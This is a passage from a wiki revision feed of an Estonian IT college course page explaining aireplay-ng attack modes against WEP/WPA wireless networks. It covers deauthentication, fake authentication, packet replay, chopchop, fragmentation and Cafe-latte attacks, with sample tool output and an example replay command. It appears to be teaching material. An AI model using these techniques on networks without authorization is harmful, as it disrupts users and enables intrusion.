&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30930</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30930"/>
		<updated>2011-05-10T08:53:26Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Open Authentication */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile random baidiarray(pusle).[6]&lt;br /&gt;
* Klient kasutab oma 64- vüi 128bitist salajast võtit ning krüptib saadud baidirea ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud array ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendab võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka APle pakke saata. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide dissimisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta broadcastis.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP cache tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentimist.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud VS broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud disconnect paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv on korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, broadcast disconnect on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.(?)&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud handshake&#039;id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib target MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC&#039;i muutmiseks juhul kui seal on algselt multicast.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30928</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30928"/>
		<updated>2011-05-10T08:49:04Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Open Authentication */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg]][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile random baidiarray(pusle).[6]&lt;br /&gt;
* Klient kasutab oma 64- vüi 128bitist salajast võtit ning krüptib saadud baidirea ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud array ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendab võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka APle pakke saata. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide dissimisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta broadcastis.[2]&lt;br /&gt;
